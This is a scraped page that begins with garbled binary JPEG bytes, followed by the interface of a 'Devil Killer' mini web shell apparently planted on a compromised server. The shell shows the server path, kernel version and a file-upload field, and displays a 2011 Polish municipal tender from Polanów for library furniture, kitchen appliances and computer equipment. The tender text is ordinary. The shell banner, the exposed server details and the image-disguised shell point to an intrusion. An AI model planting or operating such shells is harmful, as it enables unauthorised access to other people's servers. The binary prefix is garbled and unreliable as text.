JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110408/111091-N-2011.html

<p class="kh_header"><b>Polanów: Zakup wyposażenia do Biblioteki Publicznej w Polanowie</b><br>
<b>Numer ogłoszenia: 111091 - 2011; data zamieszczenia: 08.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Polanów , ul. Wolności 4, 76-010 Polanów, woj. zachodniopomorskie, tel. 094 3188351, 3480641, faks 094 3188387.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polanow.eu</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.polanow.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup wyposażenia do Biblioteki Publicznej w Polanowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Zakup wyposażenia do Biblioteki Publicznej w Polanowie
Zamówienie zostało podzielone na 3 zadania:

Zadanie I obejmuje - Dostawę i montaż mebli i wyposażenia socjalnego:
1. Lada biblioteczna do obsługi interesantów na 2 stanowiska pracownicze + 1 stanowisko dla klienta, z nadstawką, zaokrąglona, płyta orzech gr. 18 mm, ozdobne metalowe pasy w kolorze aluminium, blaty i boki gr 36 mm, krawędzie PCV - 1 szt.
2.Kontener na kółkach (pod ladę biblioteczną) wymiary (550x550x420mm), zamek, na kółkach; szuflady na kartoteki biblioteczne, prowadnice pełnego wysuwu z obciążeniem dynamicznym 30kg z systemem domykania, płyta orzech gr 18 i 36mm, krawędzie PCV - 2 szt.
3.Regały biblioteczne - wymiary (2060x1030x310mm), regały jednostronne otwarte, półki płyta orzech grubości 36mm, krawędzie PCV; boki i cokoły pokryte matą ozdobną, cokoliki tylne półek - 50 szt.
4.Stojak (regał) na czasopisma, wymiary (2060x1030x310mm), regały jednostronne, skośne półki uchylane na czasopisma, szuflada, półki i boki płyta orzech grubości 18 i 36mm, krawędzie PCV; boki i cokoły pokryte matą ozdobną - 2 szt.
5.Stojak reklamowy obrotowy, w kolorze aluminium, z kieszeniami drucianymi (kolor aluminium) o formatach 1-3 A4, A5 lub A4 - 1 szt. 
6.Tablica informacyjna wewnętrzna, wymiary (1500x1000), zamykana na zamek, szkło bezbarwne, korek pokryty materiałem do przypinania - 1 szt.
7.Wieszak stojący, kolor aluminium, okrągły, z miejscem na parasole, średnica podstawy min. 600mm, wysokość pow. 1800mm - 5 szt.  
8.Krzesła konferencyjne, tapicerowane siedzisko i oparcie, nasadowe (sztaplowane); kolor beż lub jasna zieleń, drewniane podłokietniki, stelaż w kolorze aluminium, tkanina mikro wykonana w 100% z poliestru, materiał dużej wytrzymałości na ścieralność - 35000 cykli Martindalea, atest trudnopalności - (PN-EN 1021-1) - 70 szt.
9.Stolik pod rzutnik metalowy, na kółkach, półki płyta orzech gr. 38mm, krawędzie PCV; wymiary (1120x450x550mm) - 1 szt.
10.Krzesło obrotowe do komputera, tapicerowane, kolor beż lub jasna zieleń, tkanina mikro wykonana w 100% z poliestru, materiał dużej wytrzymałości na ścieralność - 35000 cykli Martindalea, atest trudnopalności - (PN-EN 1021-1), wysokie oparcie, miękkie podłokietniki, pięcioramienna metalowa podstawa pokryta nakładkami z tworzywa, wymiary min. (1100x600x550mm) - 14 szt.
11.Stolik komputerowy 1-osobowy, z wysuwaną półką, wymiary (900x600x750mm), półka na stację roboczą i ups, ze ściankami przednią i bocznymi, płyta orzech gr 36 i 18mm - 12 szt.
12. Szafa biurowa - wymiary (2000x900x430mm), z półkami na segregatory, zamek, płyta orzech gr. 18 i 36mm, krawędzie PCV - 4 szt.
13. Stoły konferencyjne - wymiary (2000x800x725mm), z możliwością składania w stosie, aluminiowa lakierowana rama, blat z płyty orzech, gr 36mm, krawędzie PCV - 6 szt.
14. Ścianka informacyjna, wystawowa - wymiary min. (770x1513mm), 3 częściowe składane ścianki działowe na kółkach z blokadą, ogniotrwała tkanina poliestrowa, możliwość przypinania pinezek, stelaż z lakierowanego aluminium, możliwość regulacji wysokości - 1 szt.
15.Stoliki do czytelni - wymiary (1300x700mm, wys. ok. 760mm), na stelażach i nogach kwadratowych 50x50mm w kolorze aluminium, regulacja wysokości, blaty z płyty orzech gr. 36 mm, krawędzie PCV - 10 szt.
16. Krzesła do czytelni konferencyjne, materiałowe lub  tapicerowane siedzisko i oparcie, nasadowe (sztaplowane); kolor beż lub jasna zieleń, drewniane podłokietniki, stelaż aluminiowy, tkanina mikro wykonana w 100% z poliestru, materiał dużej wytrzymałości na ścieralność - 35000 cykli Martindalea, atest trudnopalności - (PN-EN 1021-1) - 20 szt.
17. Sofa do czytelni dla użytkowników biblioteki, tapicerowana, eko-skóra w kolorze czerwieni, półokrągła lub narożna na nóżkach aluminium - wymiary (szer. 2500mm, wysokość ok 890mm, głębokość ok 1960mm, wysokość siedziska 450mm, głębokość siedziska min. 500mm), wypełnienie pianka bonelowa - 1 szt.
18.Stolik do sofy - wymiary (800x800x450mm) podstawa w kolorze aluminium, płyta orzech gr 36mm, krawędzie PCV - 1 szt.
19.Pufa dla dzieci - pufy okrągłe do kącika dla najmłodszych, tapicerowane eko-skóra, miękkie, w kolorze pomarańczowym lub czerwonym, wymiary (średnica 450-500mm,wysokość 150-200mm) - 10 szt.
20.Gablota informacyjna zewnętrzna, wolnostojąca, zamykana na zamek, wykonana z aluminium anodowanego odpornego na korozję, szyba z bezpiecznego szkła akrylowego, dodatkowe uszczelki przed wodą, zamykana na zamek, nogi gabloty wys. 2500mm (do   zabetonowania w podłożu), wymiary gabloty (1500x1000x90mm), z montażem - 1 szt.

Wyposażenie do pomieszczenia socjalnego biblioteki:

1.Kuchnia elektryczna do zabudowy: płyta ceramiczna 4 pola Hi-Lite (w tym 2 poszerzone), sterowanie sensorowe, timer, zabezpieczenie przed wykipieniem, funkcja StopGo, komora piekarnika ok. 50l, elektroniczny zegar sterowany sensorowo, 6 funkcji (w tym termoobieg), prowadnice drabinkowe, EcoClen emalia, wentylator chłodzący, klasa A zabezpieczenie przed dziećmi, szlifowane krawędzie, klasa A - 1 szt.
2. Chłodziarka do zabudowy, pojemność całkowita ok. 200l. (w tym komora zamrażalnika), wysokość 1225mm, automatyczne odszranianie, sterowanie elektroniczne, progr. Eco, alarm dźwiękowy, klasa A+ - 1 szt.
3. Szafki (meble) kuchenne  - szafki dolne i górne pod zabudowę (3,2mb), kolor płyty orzech, krawędzie PCV, ociekarka w szafce 60cm, wkład na sztućce w szafce 80cm, kosz na odpady typu segregator odpadów 20l+10l+10l, mata w szafce zlewozmywakowej, zawiasy i szuflady - dodatki aluminium, uchwyty na-krawędziowe, uszczelka cokołowa, blaty grubości min. 35mm, z podwójnym zaobleniem i zabezpieczeniem przeciw-wilgociowym, blaty posiadające atest higieniczny do zastosowań w budynkach użyteczności publicznej, oświetlenie 3 halogeny pod szafkowe - 1 kpl.
4.Ekspres do kawy ręczny sterowany elektronicznie, pojemność min. 2,0 litra, 15 barów, 1050W, regulacje emisji pary, płyta podgrzewająca filiżanki, funkcja gorącej wody, alarm Thermoblock, kawa mielona i saszetki, kolor srebrny - 1 szt.
5.Dystrybutor  wody źródlanej  użyteczności publicznej: na blatowy dystrybutor wody z tunelem na kubeczki (bez dzierżawy i abonamentu), wymienne butle, moc grzewcza 550W, zimna i ciepła woda - 1 szt.

Wyposażenie pomocnicze:
1.Wertykale - Żaluzje do wszystkich pomieszczeń biblioteki 100m2 ,kolor beż lub jasna zieleń, materiał wysokiej jakości z atestem higienicznym i niepalności; szyna wykonana z aluminium, lamel z materiału o szerokości min. 125mm - 100m2.

Zadanie II obejmuje: Dostawę i instalację sprzętu komputerowego i urządzeń peryferyjnych:
1.Komputery - 14szt.- kpl. (2+12)

Konfiguracja sprzętowa stacji roboczej (serwer 1)
1.Zastosowanie	Komputer będzie wykorzystywany dla potrzeb aplikacji biurowych. internetowych i graficznych oraz obsługi jednostek klienckich.
2.Procesor min.3,00 GHz, 2- rdzeniowy. Procesor powinien osiągać w teście wydajności PassMark CPU Mark wynik min. 2200 pkt.
3.Pamięć RAM	Minimum 4 GB DDR 3, możliwość rozszerzenia do 8 GB, minimum 1 wolne złącze pamięci
4.Dysk twardy	Minimum 1 TB
5.Karta graficzna	Nie Zintegrowana, z  min. 512MB ze wsparciem dla DirectX 10, OpenGL 2.0
6.Karta dźwiękowa	nie zintegrowana 8 - kanałowa, zgodna z High Definition,
7.Karta sieciowa	2x 10-100-1000Mbit-s Ethernet 
8.Płyta główna 
PortyTypu ATX z DDR3, 2x PCI; min. 8 x USB w tym min. 2 z przodu obudowy; wymagana ilość portów nie może być uzyskana poprzez stosowanie przejściówek lub kart PCI
9.Klawiatura w układzie polski programisty
10.Mysz optyczna z rolką, podkładką pod mysz
11.Napęd optyczny1xBlu - Ray, 1xDVD +-RW wraz z pełną wersją oprogramowania do nagrywania płyt CD-DVD
12.Czytnik kart pamięci	SD, Memory Stick, M2
13.Obudowa typu tower, posiadająca min. 3 wnęki 5.25 cala i 1 wnękę 3.5cala zewnętrzne oraz min. 2 wnęki 3.5cala wewnętrzne (wnęki pełnej wysokości, nie dopuszcza się napędów typu slim) Zasilacz o mocy min. 500W
14.BIOS	Funkcja blokowania wejścia do BIOS oraz blokowania startu systemu operacyjnego, Możliwość odczytania z BIOS, bez uruchamiania systemu operacyjnego z dysku twardego komputera lub innych, podłączonych do niego, urządzeń zewnętrznych, informacji na temat: zainstalowanego procesora, pamięci operacyjnej RAM wraz z informacją o obsadzeniu slotów pamięci, obsadzeniu slotów PCI. Możliwość włączenia-wyłączenia zintegrowanej karty dźwiękowej, karty sieciowej, portu równoległego, portu szeregowego z poziomu BIOS, bez uruchamiania systemu operacyjnego z dysku twardego komputera lub innych, podłączonych do niego, urządzeń zewnętrznych. Możliwość ustawienia portów USB w trybie no BOOT, czyli podczas startu komputer nie wykrywa urządzeń bootujących typu USB, natomiast po uruchomieniu systemu operacyjnego porty USB są aktywne. Możliwość wyłączania portów USB w tym: wszystkich portów, tylko portów znajdujących się na przodzie obudowy. Możliwość zmiany trybu pracy dysku twardego: na pracę zapewniającą największą wydajność, na pracę zmniejszającą poziom hałasu generowanego przez dysk twardy.
15.Certyfikaty i standardy	Certyfikat ISO 9001:2000 dla producenta sprzętu (do oferty należy załączyć kopie certyfikatu potwierdzającą spełnianie wymogu)
Certyfikat ISO 14001 dla producenta sprzętu (do oferty należy załączyć kopie certyfikatu potwierdzającą spełnianie wymogu). Deklaracja CE (należy załączyć do oferty dokument potwierdzający spełnienie wymogu).Oferowane modele komputerów muszą posiadać certyfikat Microsoft, potwierdzający poprawną współpracę oferowanych modeli komputerów z systemem operacyjnym Vista i Windows 7 (do oferty należy załączyć wydruk ze strony Microsoft)  Głośność jednostki centralnej mierzona zgodnie z normą ISO 7779 oraz wykazana zgodnie z normą ISO 9296 w pozycji obserwatora w trybie pracy zapis/odczyt na dysk (WORK) wynosząca maksymalnie 19dB (załączyć oświadczenie producenta wraz z raportem badawczym wystawionym przez niezależną akredytowaną jednostkę)
Potwierdzenie spełnienia kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych w postaci oświadczenia wykonawcy wystawionego na podstawie dokumentacji producenta jednostki (wg wytycznych Krajowej Agencji)
16. Wsparcie techniczne 	Dostęp do aktualnych sterowników zainstalowanych w komputerze urządzeń, realizowany poprzez podanie identyfikatora klienta lub modelu komputera lub numeru seryjnego komputera, na dedykowanej przez producenta stronie internetowej - należy podać adres strony oraz sposób realizacji wymagania (opis uzyskania w-w informacji). Możliwość telefonicznego sprawdzenia konfiguracji sprzętowej komputera oraz warunków gwarancji po podaniu numeru seryjnego bezpośrednio u producenta lub jego przedstawiciela. 
17. UPS 	Zasilacz awaryjny dostosowany do zaproponowanego zestawu (jednostka centralna i monitor), umożliwiający w razie braku prądu pracę, przez co najmniej 15 minut. Minimum 2 gniazda wyjściowe z podtrzymaniem zasilania. Okablowanie potrzebne do podłączenia jednostki centralnej i monitora 
Konfiguracja sprzętowa stacji roboczej (serwer 2)
1.Zastosowanie	Komputer będzie wykorzystywany dla potrzeb aplikacji bibliotecznych (MAK, MAK+), biurowych  i obsługi Internetu - 24h.
2.Procesor 	min.3,00 GHz, 2- rdzeniowy. Procesor powinien osiągać w teście wydajności PassMark CPU Mark wynik min. 2200 pkt.
3.Pamięć RAM	Minimum 4 GB DDR 3, możliwość rozszerzenia do 8 GB
4.Dysk twardy	Minimum 500 GB
5.Karta graficzna	 min. 512MB RAM
6.Karta dźwiękowa	zintegrowana zgodna z High Definition,
7.Karta sieciowa	2x 10-100-1000Mbit-s, Ethernet 
8.Płyta główna Porty	z DDR3, 2x PCI; wbudowane: 1 x RS232, 1 x VGA; min. 6 x USB w tym min. 2 z przodu obudowy; wymagana ilość portów nie może być uzyskana poprzez stosowanie przejściówek lub kart PCI
9.Klawiatura w układzie polski programisty
10.Mysz optyczna z rolką, podkładką pod mysz
11.Napęd optyczny	Nagrywarka DVD +-RW wraz z oprogramowaniem do nagrywania płyt
12.Czytnik kart pamięci	SD
13.Obudowa i Podzespoły sieci logicznej	Obudowa typu tower, posiadająca min. 2 wnęki 5.25cala i 1 wnękę 3.5cala zewnętrzne oraz min. 2 wnęki 3.5cala wewnętrzne (wnęki pełnej wysokości, nie dopuszcza się napędów typu slim)
Zasilacz o mocy min. 300W o bardzo wysokiej wytrzymałości, przystosowany do całodobowej pracy. Serwer musi być zamknięty w szafie serwerowej 19cala (37U) z nóżkami lub kółkami, drzwi przednie z perforacją boki zdejmowane pełne, a szafa wyposażona w następujące podzespoły sieci logicznej: Patch panel (krosujący) 19cala kat. 5e; Switch 10/100/1000  min. 24portowy; Router z Wi-Fi, Listwa zasilająca 19-1U 8 portowa z wyłącznikiem i z wtyczką do UPS
14.BIOS	Funkcja blokowania wejścia do BIOS oraz blokowania startu systemu operacyjnego, Możliwość odczytania z BIOS, bez uruchamiania systemu operacyjnego z dysku twardego komputera lub innych, podłączonych do niego, urządzeń zewnętrznych, informacji na temat: zainstalowanego procesora, pamięci operacyjnej RAM wraz z informacją o obsadzeniu slotów pamięci, obsadzeniu slotów PCI. Możliwość włączenia-wyłączenia zintegrowanej karty dźwiękowej, karty sieciowej, portu równoległego, portu szeregowego z poziomu BIOS, bez uruchamiania systemu operacyjnego z dysku twardego komputera lub innych, podłączonych do niego, urządzeń zewnętrznych. Możliwość ustawienia portów USB w trybie -no BOOT-, czyli podczas startu komputer nie wykrywa urządzeń bootujących typu USB, natomiast po uruchomieniu systemu operacyjnego porty USB są aktywne. Możliwość wyłączania portów USB w tym: wszystkich portów, tylko portów znajdujących się na przodzie obudowy. Możliwość zmiany trybu pracy dysku twardego: na pracę zapewniającą największą wydajność, na pracę zmniejszającą poziom hałasu generowanego przez dysk twardy.
15.Certyfikaty i standardy	Certyfikat ISO 9001:2000 dla producenta sprzętu (do oferty należy załączyć kopie certyfikatu potwierdzającą spełnianie wymogu) Certyfikat ISO 14001 dla producenta sprzętu (do oferty należy załączyć kopie certyfikatu potwierdzającą spełnianie wymogu) Deklaracja CE (należy załączyć do oferty dokument potwierdzający spełnienie wymogu) Oferowane modele komputerów muszą posiadać certyfikat Microsoft, potwierdzający poprawną współpracę oferowanych modeli komputerów z systemem operacyjnym Vista i Windows 7 (do oferty należy załączyć wydruk ze strony Microsoft) Głośność jednostki centralnej mierzona zgodnie z normą ISO 7779 oraz wykazana zgodnie z normą ISO 9296 w pozycji obserwatora w trybie pracy zapis/odczyt na dysk (WORK) wynosząca maksymalnie 19dB (załączyć oświadczenie producenta wraz z raportem badawczym wystawionym przez niezależną akredytowaną jednostkę)
Potwierdzenie spełnienia kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych w postaci oświadczenia wykonawcy wystawionego na podstawie dokumentacji producenta jednostki (wg wytycznych Krajowej Agencji)
16.Wsparcie techniczne 	Dostęp do aktualnych sterowników zainstalowanych w komputerze urządzeń, realizowany poprzez podanie identyfikatora klienta lub modelu komputera lub numeru seryjnego komputera, na dedykowanej przez producenta stronie internetowej - należy podać adres strony oraz sposób realizacji wymagania (opis uzyskania w/w informacji). Możliwość telefonicznego sprawdzenia konfiguracji sprzętowej komputera oraz warunków gwarancji po podaniu numeru seryjnego bezpośrednio u producenta lub jego przedstawiciela. 
17. Zasilacz awaryjny UPS 	Zasilacz awaryjny dostosowany do zaproponowanego zestawu (jednostka centralna i monitor), umożliwiający w razie braku prądu pracę, przez co najmniej 15 minut. Minimum 2 gniazda wyjściowe z podtrzymaniem zasilania. Okablowanie potrzebne do podłączenia jednostki centralnej i monitora 
Konfiguracja sprzętowa dla stacji roboczej  (stanowiska klienckie x 12)
1.Zastosowanie	Komputer będzie wykorzystywany dla potrzeb aplikacji internetowych, edukacyjnych i biurowych  przez klientów.
2.Procesor min.2,80 GHz, 2- rdzeniowy. Procesor powinien osiągać w teście wydajności PassMark CPU Mark wynik min. 2000 pkt.
3.Pamięć RAM	Minimum 4 GB DDR 3, minimum 1 wolne złącza pamięci
4.Dysk twardy	Minimum 320 GB
5.Karta graficzna	 z  min. 512MB ze wsparciem dla DirectX  9
6.Karta sieciowa	1x 10-100-1000Mbit-s Ethernet LAN
8.Płyta główna PortyTypu ATX z DDR3, 2x PCI; wbudowane: 1 x VGA; min. 6 x USB w tym min. 2 z przodu obudowy; wymagana ilość portów nie może być uzyskana poprzez stosowanie przejściówek lub kart PCI
9.Klawiatura w układzie polski programisty
10.Mysz optyczna z rolką, podkładką pod mysz
11.Napęd optyczny	Nagrywarka DVD+-RW wraz z oprogramowaniem do nagrywania płyt CD-/DVD
12.Czytnik kart pamięci	SD
13.Obudowa typu tower, posiadająca min. 2 wnęki 5.25cala i 1 wnękę 3.5cala zewnętrzne oraz min. 2 wnęki 3.5cala wewnętrzne (wnęki pełnej wysokości, nie dopuszcza się napędów typu slim) Zasilacz o mocy min. 400W
15.BIOS	Funkcja blokowania wejścia do BIOS oraz blokowania startu systemu operacyjnego, Możliwość odczytania z BIOS, bez uruchamiania systemu operacyjnego z dysku twardego komputera lub innych, podłączonych do niego, urządzeń zewnętrznych, informacji na temat: zainstalowanego procesora, pamięci operacyjnej RAM wraz z informacją o obsadzeniu slotów pamięci, obsadzeniu slotów PCI. Możliwość włączenia-wyłączenia zintegrowanej karty dźwiękowej, karty sieciowej, portu równoległego, portu szeregowego z poziomu BIOS, bez uruchamiania systemu operacyjnego z dysku twardego komputera lub innych, podłączonych do niego, urządzeń zewnętrznych. Możliwość ustawienia portów USB w trybie no BOOT, czyli podczas startu komputer nie wykrywa urządzeń bootujących typu USB, natomiast po uruchomieniu systemu operacyjnego porty USB są aktywne. Możliwość wyłączania portów USB w tym: wszystkich portów, tylko portów znajdujących się na przodzie obudowy. Możliwość zmiany trybu pracy dysku twardego: na pracę zapewniającą największą wydajność, na pracę zmniejszającą poziom hałasu generowanego przez dysk twardy.
16.Certyfikaty i standardy	Certyfikat ISO 9001:2000 dla producenta sprzętu (do oferty należy załączyć kopie certyfikatu potwierdzającą spełnianie wymogu)
Certyfikat ISO 14001 dla producenta sprzętu (do oferty należy załączyć kopie certyfikatu potwierdzającą spełnianie wymogu) Deklaracja CE (należy załączyć do oferty dokument potwierdzający spełnienie wymogu) Oferowane modele komputerów muszą posiadać certyfikat Microsoft, potwierdzający poprawną współpracę oferowanych modeli komputerów z systemem operacyjnym Vista i Windows 7 (do oferty należy załączyć wydruk ze strony Microsoft) Głośność jednostki centralnej mierzona zgodnie z normą ISO 7779 oraz wykazana zgodnie z normą ISO 9296 w pozycji obserwatora w trybie pracy zapis/odczyt na dysk (WORK) wynosząca maksymalnie 19dB (załączyć oświadczenie producenta wraz z raportem badawczym wystawionym przez niezależną akredytowaną jednostkę)
Potwierdzenie spełnienia kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych w postaci oświadczenia wykonawcy wystawionego na podstawie dokumentacji producenta jednostki (wg wytycznych Krajowej Agencji
17. Wsparcie techniczne Dostęp do aktualnych sterowników zainstalowanych w komputerze urządzeń, realizowany poprzez podanie identyfikatora klienta lub modelu komputera lub numeru seryjnego komputera, na dedykowanej przez producenta stronie internetowej - należy podać adres strony oraz sposób realizacji wymagania (opis uzyskania w/w informacji). Możliwość telefonicznego sprawdzenia konfiguracji sprzętowej komputera oraz warunków gwarancji po podaniu numeru seryjnego bezpośrednio u producenta lub jego przedstawiciela. 
18. Zasilacz awaryjny UPS 	Zasilacz awaryjny dostosowany do zaproponowanego zestawu (jednostka centralna i monitor), umożliwiający w razie braku prądu pracę, przez co najmniej 15 minut. Minimum 2 gniazda wyjściowe z podtrzymaniem zasilania.  Okablowanie potrzebne do podłączenia jednostki centralnej i monitora 
2.Monitory - 12szt. dla: 
1.Monitor dla serwera 1 x 1szt.
LCD min.22 cali; Kontrast: typowy 1000: 1; Jasność 250 cd-m2; czas reakcji 2 ms  Złącze: 15-stykowe złącze D-Sub, złącze DVI-D z HDCP  z głośnikami i kamerą internetową. Monitor powinien być wyposażony w tzw. Kensington Slot - gniazdo zabezpieczenia przed kradzieżą. 
2Monitor dla serwera 2 x 1szt LCD min.17 cali; Kontrast: typowy 1000: 1 Jasność 250 cd-m2; czas reakcji 2 ms;  Złącze: 15-stykowe złącze D-Sub, złącze DVI-D
3Monitor dla  komputerów klienckich x 12szt.	LCD min.19 cali; Kontrast: typowy 1000: 1; Jasność 250 cd-m2; czas reakcji 2 ms;  Złącze: 15-stykowe złącze D-Sub, złącze DVI-D z HDCP  z głośnikami i kamerą internetową. 
Monitory dla komputerów klienckich
Razem Monitory	14 sztuk
3. Oprogramowanie
a.System operacyjny dla serwera 1 x 1szt.	Microsoft Windows 7 Professional PL 32-bit, (wersja BOX)  niewymagający aktywacji za pomocą telefonu lub Internetu w firmie Microsoft. Dołączony nośnik z oprogramowaniem.
System operacyjny dla serwera 2 x 1szt	System operacyjny Windows niewymagający aktywacji
System operacyjny dla  komputerów klienckich 
x 12szt.	Microsoft Windows 7 Home PL 32-bit,  Dołączony nośnik z oprogramowaniem.
b.Oprogramowanie użytkowe	Pakiet biurowy dla serwera 1 szt.x1	Profesjonalny  Pakiet biurowy: Edytor tekstu, Arkusz kalkulacyjny, Program do tworzenia prezentacji,  System obsługi relacyjnych baz danych, Program pocztowy (min. MS Office 2007 Professional PL, dopuszcza się w-w oprogramowanie w wersji OEM). - dołączony nośnik z oprogramowaniem; oprogramowanie OCR oraz aplikacja zarządzania stacjami klienckimi. -dołączony nośniki z oprogramowaniem.
Pakiet biurowy dla serwera 2 szt.x1	Edytor tekstu, Arkusz kalkulacyjny, Program do tworzenia prezentacji,  System obsługi relacyjnych baz danych, Program pocztowy, wskazane jest by w-w oprogramowanie  było w wersji OEM. - dołączony nośnik z oprogramowaniem.
Pakiet biurowy dla komputerów klienckich szt.x12	Edytor tekstu, Arkusz kalkulacyjny, Program do tworzenia prezentacji,  System obsługi relacyjnych baz danych, Program pocztowy, dopuszcza się w-w oprogramowanie w wersji OEM).  Licencja na każde stanowisko - dołączony nośnik z oprogramowaniem.
4. Program antywirusowy
